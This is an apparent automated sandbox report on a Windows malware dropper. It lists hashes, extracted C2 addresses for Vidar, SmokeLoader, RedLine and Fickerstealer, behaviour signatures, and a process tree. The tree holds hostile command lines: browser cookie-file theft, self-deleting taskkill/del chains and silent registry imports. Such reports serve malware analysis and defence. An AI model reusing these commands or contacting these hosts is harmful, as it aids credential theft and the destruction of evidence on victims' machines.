Resubmissions

13-08-2021 10:16

210813-wpta271jdx 10

08-08-2021 23:00

210808-fgs5g9pxfs 10

07-08-2021 23:12

210807-g2jw1lmd4a 10

07-08-2021 16:10

210807-51nhct4kfx 10

06-08-2021 23:43

210806-gc2271nxwj 10

06-08-2021 06:00

210806-f443x39x8a 10

05-08-2021 17:08

210805-97y6banvvx 10

04-08-2021 17:25

210804-hkxx2ntr8x 10

04-08-2021 12:12

210804-rjbg4b4y7n 10

03-08-2021 17:12

210803-r2h7ytjwqj 10

Analysis

  • max time kernel
    153s
  • max time network
    163s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    19-07-2021 22:53

General

  • Target

    8 (2).exe

  • Size

    3.0MB

  • MD5

    bb072cad921aa5ce8b97706ce01bc570

  • SHA1

    18bf034906c1341b7817e7361ad27a4425d820bd

  • SHA256

    817a50d00909383bbef41e6f4e61b527d55f0873bcf745b29dbba75f52fe2e97

  • SHA512

    d40e5f77d882ed29bd9de5a6848072e2f81cd02176955e2b1a4aedcdf4eb687d77bebe33cef0c7d702bc828181755f86e2564523d476adbb785f396a5ce1d474

Malware Config

Extracted

Family

vidar

Version

39.6

Botnet

933

C2

https://sslamlssa1.tumblr.com/

Attributes
  • profile_id

    933

Extracted

Family

smokeloader

Version

2020

C2

http://conceitosseg.com/upload/

http://integrasidata.com/upload/

http://ozentekstil.com/upload/

http://finbelportal.com/upload/

http://telanganadigital.com/upload/

rc4.i32
rc4.i32

Extracted

Family

redline

Botnet

sel16

C2

dwarimlari.xyz:80

Extracted

Family

redline

Botnet

oboze_new_serv

C2

86.106.181.209:18845

Extracted

Family

redline

Botnet

AL

C2

tstamore.info:80

Extracted

Family

redline

Botnet

sel17

C2

dwarimlari.xyz:80

Extracted

Family

vidar

Version

39.6

Botnet

903

C2

https://sslamlssa1.tumblr.com/

Attributes
  • profile_id

    903

Extracted

Family

vidar

Version

39.6

Botnet

865

C2

https://sslamlssa1.tumblr.com/

Attributes
  • profile_id

    865

Extracted

Family

fickerstealer

C2

37.0.8.225:80

Extracted

Family

metasploit

Version

windows/single_exec

Signatures

  • Fickerstealer

    Ficker is an infostealer written in Rust and ASM.

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 2 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Process spawned unexpected child process 5 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 12 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • redlinestealer 9 IoCs

    RedlineStealer.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 6 IoCs
  • ASPack v2.12-2.42 8 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Downloads MZ/PE file
  • Executes dropped EXE 34 IoCs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • VMProtect packed file 3 IoCs

    Detects executables packed with VMProtect commercial packer.

  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Loads dropped DLL 9 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Themida packer 2 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 13 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Program Files directory 7 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 19 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 5 IoCs
  • Kills process with taskkill 6 IoCs
  • Modifies data under HKEY_USERS 5 IoCs
  • Modifies registry class 15 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Runs .reg file with regedit 2 IoCs
  • Runs ping.exe 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 24 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s Themes
    1⤵
      PID:1136
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s SENS
      1⤵
        PID:1296
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
        1⤵
          PID:1096
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s Schedule
          1⤵
            PID:932
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
            1⤵
              PID:1004
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s Browser
              1⤵
                PID:2768
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s WpnService
                1⤵
                  PID:2688
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
                  1⤵
                    PID:2660
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
                    1⤵
                      PID:2460
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
                      1⤵
                        PID:2424
                      • c:\windows\system32\svchost.exe
                        c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
                        1⤵
                          PID:1764
                        • c:\windows\system32\svchost.exe
                          c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                          1⤵
                            PID:1344
                          • C:\Users\Admin\AppData\Local\Temp\8 (2).exe
                            "C:\Users\Admin\AppData\Local\Temp\8 (2).exe"
                            1⤵
                            • Suspicious use of WriteProcessMemory
                            PID:664
                            • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                              "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
                              2⤵
                              • Executes dropped EXE
                              • Suspicious use of WriteProcessMemory
                              PID:3756
                              • C:\Users\Admin\AppData\Local\Temp\7zSCAEE72F4\setup_install.exe
                                "C:\Users\Admin\AppData\Local\Temp\7zSCAEE72F4\setup_install.exe"
                                3⤵
                                • Executes dropped EXE
                                • Loads dropped DLL
                                • Suspicious use of WriteProcessMemory
                                PID:408
                                • C:\Windows\SysWOW64\cmd.exe
                                  C:\Windows\system32\cmd.exe /c sonia_1.exe
                                  4⤵
                                  • Suspicious use of WriteProcessMemory
                                  PID:1180
                                  • C:\Users\Admin\AppData\Local\Temp\7zSCAEE72F4\sonia_1.exe
                                    sonia_1.exe
                                    5⤵
                                    • Executes dropped EXE
                                    • Suspicious use of WriteProcessMemory
                                    PID:3964
                                    • C:\Users\Admin\AppData\Local\Temp\7zSCAEE72F4\sonia_1.exe
                                      "C:\Users\Admin\AppData\Local\Temp\7zSCAEE72F4\sonia_1.exe" -a
                                      6⤵
                                      • Executes dropped EXE
                                      PID:688
                                • C:\Windows\SysWOW64\cmd.exe
                                  C:\Windows\system32\cmd.exe /c sonia_2.exe
                                  4⤵
                                  • Suspicious use of WriteProcessMemory
                                  PID:1304
                                  • C:\Users\Admin\AppData\Local\Temp\7zSCAEE72F4\sonia_2.exe
                                    sonia_2.exe
                                    5⤵
                                    • Executes dropped EXE
                                    • Loads dropped DLL
                                    • Checks SCSI registry key(s)
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious behavior: MapViewOfSection
                                    PID:3864
                                • C:\Windows\SysWOW64\cmd.exe
                                  C:\Windows\system32\cmd.exe /c sonia_3.exe
                                  4⤵
                                  • Suspicious use of WriteProcessMemory
                                  PID:2140
                                  • C:\Users\Admin\AppData\Local\Temp\7zSCAEE72F4\sonia_3.exe
                                    sonia_3.exe
                                    5⤵
                                    • Executes dropped EXE
                                    • Modifies system certificate store
                                    PID:3868
                                    • C:\Windows\SysWOW64\cmd.exe
                                      "C:\Windows\System32\cmd.exe" /c taskkill /im sonia_3.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\7zSCAEE72F4\sonia_3.exe" & del C:\ProgramData\*.dll & exit
                                      6⤵
                                        PID:5220
                                        • C:\Windows\SysWOW64\taskkill.exe
                                          taskkill /im sonia_3.exe /f
                                          7⤵
                                          • Kills process with taskkill
                                          PID:5856
                                        • C:\Windows\SysWOW64\timeout.exe
                                          timeout /t 6
                                          7⤵
                                          • Delays execution with timeout.exe
                                          PID:2224
                                  • C:\Windows\SysWOW64\cmd.exe
                                    C:\Windows\system32\cmd.exe /c sonia_4.exe
                                    4⤵
                                    • Suspicious use of WriteProcessMemory
                                    PID:2292
                                    • C:\Users\Admin\AppData\Local\Temp\7zSCAEE72F4\sonia_4.exe
                                      sonia_4.exe
                                      5⤵
                                      • Executes dropped EXE
                                      • Suspicious use of AdjustPrivilegeToken
                                      • Suspicious use of WriteProcessMemory
                                      PID:3232
                                      • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                        "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                                        6⤵
                                        • Executes dropped EXE
                                        PID:2728
                                        • C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
                                          "C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"
                                          7⤵
                                            PID:5056
                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                              8⤵
                                                PID:4672
                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                8⤵
                                                  PID:5620
                                              • C:\Users\Admin\AppData\Local\Temp\OLKbrowser.exe
                                                "C:\Users\Admin\AppData\Local\Temp\OLKbrowser.exe"
                                                7⤵
                                                • Executes dropped EXE
                                                PID:4332
                                                • C:\Users\Admin\AppData\Local\Temp\OLKbrowser.exe
                                                  C:\Users\Admin\AppData\Local\Temp\OLKbrowser.exe
                                                  8⤵
                                                    PID:3984
                                                  • C:\Users\Admin\AppData\Local\Temp\OLKbrowser.exe
                                                    C:\Users\Admin\AppData\Local\Temp\OLKbrowser.exe
                                                    8⤵
                                                      PID:888
                                                  • C:\Users\Admin\AppData\Local\Temp\setup 326.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\setup 326.exe"
                                                    7⤵
                                                      PID:4628
                                                      • C:\Windows\winnetdriv.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\setup 326.exe" 1626744813 0
                                                        8⤵
                                                          PID:5044
                                                      • C:\Users\Admin\AppData\Local\Temp\setup.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
                                                        7⤵
                                                          PID:4820
                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4820 -s 804
                                                            8⤵
                                                            • Program crash
                                                            PID:5240
                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4820 -s 836
                                                            8⤵
                                                            • Program crash
                                                            PID:5440
                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4820 -s 884
                                                            8⤵
                                                            • Program crash
                                                            PID:5560
                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4820 -s 1012
                                                            8⤵
                                                            • Program crash
                                                            PID:5816
                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4820 -s 1092
                                                            8⤵
                                                            • Program crash
                                                            PID:5936
                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4820 -s 1076
                                                            8⤵
                                                            • Program crash
                                                            PID:6092
                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4820 -s 876
                                                            8⤵
                                                            • Program crash
                                                            PID:4080
                                                        • C:\Users\Admin\AppData\Local\Temp\zhangd.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\zhangd.exe"
                                                          7⤵
                                                            PID:3772
                                                            • C:\Users\Admin\AppData\Local\Temp\zhangd.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\zhangd.exe" -a
                                                              8⤵
                                                                PID:5572
                                                            • C:\Users\Admin\AppData\Local\Temp\Chrome Update.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\Chrome Update.exe"
                                                              7⤵
                                                                PID:4928
                                                                • C:\Windows\system32\WerFault.exe
                                                                  C:\Windows\system32\WerFault.exe -u -p 4928 -s 1020
                                                                  8⤵
                                                                  • Program crash
                                                                  PID:5752
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c sonia_5.exe
                                                          4⤵
                                                          • Suspicious use of WriteProcessMemory
                                                          PID:1160
                                                          • C:\Users\Admin\AppData\Local\Temp\7zSCAEE72F4\sonia_5.exe
                                                            sonia_5.exe
                                                            5⤵
                                                            • Executes dropped EXE
                                                            PID:4008
                                                            • C:\Users\Admin\Documents\deUbPCGXoQv6_B0JUjblilOw.exe
                                                              "C:\Users\Admin\Documents\deUbPCGXoQv6_B0JUjblilOw.exe"
                                                              6⤵
                                                              • Executes dropped EXE
                                                              PID:4564
                                                              • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                7⤵
                                                                  PID:5356
                                                                • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                  C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                  7⤵
                                                                    PID:6132
                                                                  • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                    C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                    7⤵
                                                                      PID:5880
                                                                    • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                      C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                      7⤵
                                                                        PID:1032
                                                                    • C:\Users\Admin\Documents\gOSneBnQxbWG1GUpt88pDWZP.exe
                                                                      "C:\Users\Admin\Documents\gOSneBnQxbWG1GUpt88pDWZP.exe"
                                                                      6⤵
                                                                        PID:4548
                                                                        • C:\Users\Admin\Documents\gOSneBnQxbWG1GUpt88pDWZP.exe
                                                                          C:\Users\Admin\Documents\gOSneBnQxbWG1GUpt88pDWZP.exe
                                                                          7⤵
                                                                            PID:4236
                                                                          • C:\Users\Admin\Documents\gOSneBnQxbWG1GUpt88pDWZP.exe
                                                                            C:\Users\Admin\Documents\gOSneBnQxbWG1GUpt88pDWZP.exe
                                                                            7⤵
                                                                              PID:1324
                                                                          • C:\Users\Admin\Documents\e5IzdFo6qF52SF_WLcauODww.exe
                                                                            "C:\Users\Admin\Documents\e5IzdFo6qF52SF_WLcauODww.exe"
                                                                            6⤵
                                                                            • Executes dropped EXE
                                                                            PID:4512
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              "C:\Windows\System32\cmd.exe" /c cmd < Sorrisi.tmp
                                                                              7⤵
                                                                                PID:3040
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  cmd
                                                                                  8⤵
                                                                                    PID:3844
                                                                                    • C:\Windows\SysWOW64\findstr.exe
                                                                                      findstr /V /R "^yNFefWPitqXbQXexaaaweTJMeyyzoIKOZcrabptodYbHejNKUaJtRjoktSZpRcZcdpbxUJWpgpLtcwKPaxnPYFWNhRgFpV$" Sapete.tmp
                                                                                      9⤵
                                                                                        PID:5928
                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com
                                                                                        Acre.exe.com k
                                                                                        9⤵
                                                                                          PID:5320
                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com
                                                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com k
                                                                                            10⤵
                                                                                              PID:4160
                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com
                                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com k
                                                                                                11⤵
                                                                                                  PID:5664
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com
                                                                                                    C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com k
                                                                                                    12⤵
                                                                                                      PID:5904
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com
                                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com k
                                                                                                        13⤵
                                                                                                          PID:3768
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com
                                                                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com k
                                                                                                            14⤵
                                                                                                              PID:4872
                                                                                                  • C:\Windows\SysWOW64\PING.EXE
                                                                                                    ping 127.0.0.1 -n 30
                                                                                                    9⤵
                                                                                                    • Runs ping.exe
                                                                                                    PID:5548
                                                                                            • C:\Users\Admin\Documents\ub9YN_0H1Ic1atzIvRGJfFIN.exe
                                                                                              "C:\Users\Admin\Documents\ub9YN_0H1Ic1atzIvRGJfFIN.exe"
                                                                                              6⤵
                                                                                              • Executes dropped EXE
                                                                                              • Drops file in Program Files directory
                                                                                              PID:4504
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\EverestSoftrade\TonerRecover\log.bat" "
                                                                                                7⤵
                                                                                                  PID:3064
                                                                                                  • C:\Windows\SysWOW64\explorer.exe
                                                                                                    explorer https://iplogger.org/2LBCU6
                                                                                                    8⤵
                                                                                                      PID:4968
                                                                                                    • C:\Windows\SysWOW64\regedit.exe
                                                                                                      regedit /s adj.reg
                                                                                                      8⤵
                                                                                                      • Runs .reg file with regedit
                                                                                                      PID:6064
                                                                                                    • C:\Windows\SysWOW64\regedit.exe
                                                                                                      regedit /s adj2.reg
                                                                                                      8⤵
                                                                                                      • Runs .reg file with regedit
                                                                                                      PID:6836
                                                                                                  • C:\Program Files (x86)\EverestSoftrade\TonerRecover\Updater.exe
                                                                                                    "C:\Program Files (x86)\EverestSoftrade\TonerRecover\Updater.exe"
                                                                                                    7⤵
                                                                                                      PID:4856
                                                                                                      • C:\Program Files (x86)\EverestSoftrade\TonerRecover\Updater.exe
                                                                                                        "C:\Program Files (x86)\EverestSoftrade\TonerRecover\Updater.exe"
                                                                                                        8⤵
                                                                                                          PID:5480
                                                                                                    • C:\Users\Admin\Documents\I4Bh74RwbKPDMUQdc3tr2dmT.exe
                                                                                                      "C:\Users\Admin\Documents\I4Bh74RwbKPDMUQdc3tr2dmT.exe"
                                                                                                      6⤵
                                                                                                      • Executes dropped EXE
                                                                                                      PID:4496
                                                                                                    • C:\Users\Admin\Documents\umieuwjxaCypVFDIq22cSdMQ.exe
                                                                                                      "C:\Users\Admin\Documents\umieuwjxaCypVFDIq22cSdMQ.exe"
                                                                                                      6⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Suspicious use of SetThreadContext
                                                                                                      PID:4480
                                                                                                      • C:\Users\Admin\Documents\umieuwjxaCypVFDIq22cSdMQ.exe
                                                                                                        C:\Users\Admin\Documents\umieuwjxaCypVFDIq22cSdMQ.exe
                                                                                                        7⤵
                                                                                                          PID:4332
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4332 -s 24
                                                                                                            8⤵
                                                                                                            • Program crash
                                                                                                            PID:4976
                                                                                                      • C:\Users\Admin\Documents\C3vXp7AKOx16KcbdtEVQmJNr.exe
                                                                                                        "C:\Users\Admin\Documents\C3vXp7AKOx16KcbdtEVQmJNr.exe"
                                                                                                        6⤵
                                                                                                        • Executes dropped EXE
                                                                                                        PID:4472
                                                                                                        • C:\Users\Admin\Documents\C3vXp7AKOx16KcbdtEVQmJNr.exe
                                                                                                          C:\Users\Admin\Documents\C3vXp7AKOx16KcbdtEVQmJNr.exe
                                                                                                          7⤵
                                                                                                          • Executes dropped EXE
                                                                                                          PID:3948
                                                                                                        • C:\Users\Admin\Documents\C3vXp7AKOx16KcbdtEVQmJNr.exe
                                                                                                          C:\Users\Admin\Documents\C3vXp7AKOx16KcbdtEVQmJNr.exe
                                                                                                          7⤵
                                                                                                            PID:4896
                                                                                                        • C:\Users\Admin\Documents\brkEGu3hmBezm9mh_NDeoqcS.exe
                                                                                                          "C:\Users\Admin\Documents\brkEGu3hmBezm9mh_NDeoqcS.exe"
                                                                                                          6⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                          PID:4464
                                                                                                          • C:\Users\Admin\Documents\brkEGu3hmBezm9mh_NDeoqcS.exe
                                                                                                            C:\Users\Admin\Documents\brkEGu3hmBezm9mh_NDeoqcS.exe
                                                                                                            7⤵
                                                                                                              PID:5052
                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                "C:\Windows\System32\cmd.exe" /c taskkill /im brkEGu3hmBezm9mh_NDeoqcS.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\brkEGu3hmBezm9mh_NDeoqcS.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                8⤵
                                                                                                                  PID:4716
                                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                    taskkill /im brkEGu3hmBezm9mh_NDeoqcS.exe /f
                                                                                                                    9⤵
                                                                                                                    • Kills process with taskkill
                                                                                                                    PID:6008
                                                                                                                  • C:\Windows\SysWOW64\timeout.exe
                                                                                                                    timeout /t 6
                                                                                                                    9⤵
                                                                                                                    • Delays execution with timeout.exe
                                                                                                                    PID:5744
                                                                                                              • C:\Users\Admin\Documents\brkEGu3hmBezm9mh_NDeoqcS.exe
                                                                                                                C:\Users\Admin\Documents\brkEGu3hmBezm9mh_NDeoqcS.exe
                                                                                                                7⤵
                                                                                                                  PID:4136
                                                                                                              • C:\Users\Admin\Documents\l2KWb4Kf2uOm_ETJ5k_H7S0A.exe
                                                                                                                "C:\Users\Admin\Documents\l2KWb4Kf2uOm_ETJ5k_H7S0A.exe"
                                                                                                                6⤵
                                                                                                                • Executes dropped EXE
                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                PID:4456
                                                                                                                • C:\Users\Admin\Documents\l2KWb4Kf2uOm_ETJ5k_H7S0A.exe
                                                                                                                  C:\Users\Admin\Documents\l2KWb4Kf2uOm_ETJ5k_H7S0A.exe
                                                                                                                  7⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  PID:508
                                                                                                              • C:\Users\Admin\Documents\8OaxCl2cV7pY_t14vO1oUpNO.exe
                                                                                                                "C:\Users\Admin\Documents\8OaxCl2cV7pY_t14vO1oUpNO.exe"
                                                                                                                6⤵
                                                                                                                • Executes dropped EXE
                                                                                                                PID:5116
                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                  "C:\Windows\System32\cmd.exe" /c taskkill /im 8OaxCl2cV7pY_t14vO1oUpNO.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\8OaxCl2cV7pY_t14vO1oUpNO.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                  7⤵
                                                                                                                    PID:840
                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                      taskkill /im 8OaxCl2cV7pY_t14vO1oUpNO.exe /f
                                                                                                                      8⤵
                                                                                                                      • Kills process with taskkill
                                                                                                                      PID:5984
                                                                                                                    • C:\Windows\SysWOW64\timeout.exe
                                                                                                                      timeout /t 6
                                                                                                                      8⤵
                                                                                                                      • Delays execution with timeout.exe
                                                                                                                      PID:5664
                                                                                                                • C:\Users\Admin\Documents\6KFZdtPPkgePfsqBb4_c_4sM.exe
                                                                                                                  "C:\Users\Admin\Documents\6KFZdtPPkgePfsqBb4_c_4sM.exe"
                                                                                                                  6⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  PID:5104
                                                                                                                • C:\Users\Admin\Documents\TIrq_l4cKBtbgwLkPRmFqsDw.exe
                                                                                                                  "C:\Users\Admin\Documents\TIrq_l4cKBtbgwLkPRmFqsDw.exe"
                                                                                                                  6⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  PID:3596
                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 3596 -s 660
                                                                                                                    7⤵
                                                                                                                    • Program crash
                                                                                                                    PID:5080
                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 3596 -s 676
                                                                                                                    7⤵
                                                                                                                    • Program crash
                                                                                                                    PID:4604
                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 3596 -s 632
                                                                                                                    7⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    • Program crash
                                                                                                                    PID:4548
                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 3596 -s 660
                                                                                                                    7⤵
                                                                                                                    • Program crash
                                                                                                                    PID:4932
                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 3596 -s 1088
                                                                                                                    7⤵
                                                                                                                    • Program crash
                                                                                                                    PID:4696
                                                                                                                • C:\Users\Admin\Documents\zpnUFrHTadMLz2dnWl95x8T7.exe
                                                                                                                  "C:\Users\Admin\Documents\zpnUFrHTadMLz2dnWl95x8T7.exe"
                                                                                                                  6⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  • Checks BIOS information in registry
                                                                                                                  • Checks whether UAC is enabled
                                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                  PID:3936
                                                                                                                • C:\Users\Admin\Documents\R9wmrbRIujoVZONP6AOBgw8x.exe
                                                                                                                  "C:\Users\Admin\Documents\R9wmrbRIujoVZONP6AOBgw8x.exe"
                                                                                                                  6⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  PID:1484
                                                                                                                • C:\Users\Admin\Documents\KsGJlEcd0R9EG4JA6mVtXzgT.exe
                                                                                                                  "C:\Users\Admin\Documents\KsGJlEcd0R9EG4JA6mVtXzgT.exe"
                                                                                                                  6⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  PID:4388
                                                                                                                  • C:\Users\Admin\Documents\KsGJlEcd0R9EG4JA6mVtXzgT.exe
                                                                                                                    "C:\Users\Admin\Documents\KsGJlEcd0R9EG4JA6mVtXzgT.exe"
                                                                                                                    7⤵
                                                                                                                      PID:4804
                                                                                                                  • C:\Users\Admin\Documents\P_jljMXLJxK1kNKK4bIbo_Ni.exe
                                                                                                                    "C:\Users\Admin\Documents\P_jljMXLJxK1kNKK4bIbo_Ni.exe"
                                                                                                                    6⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    PID:928
                                                                                                                    • C:\Users\Admin\Documents\P_jljMXLJxK1kNKK4bIbo_Ni.exe
                                                                                                                      C:\Users\Admin\Documents\P_jljMXLJxK1kNKK4bIbo_Ni.exe
                                                                                                                      7⤵
                                                                                                                        PID:3476
                                                                                                                    • C:\Users\Admin\Documents\LtkSOjrcVI8hTJqHVIUw5dOP.exe
                                                                                                                      "C:\Users\Admin\Documents\LtkSOjrcVI8hTJqHVIUw5dOP.exe"
                                                                                                                      6⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      PID:4532
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
                                                                                                                        7⤵
                                                                                                                          PID:5100
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zSCE333CA5\setup_install.exe
                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\7zSCE333CA5\setup_install.exe"
                                                                                                                            8⤵
                                                                                                                              PID:5232
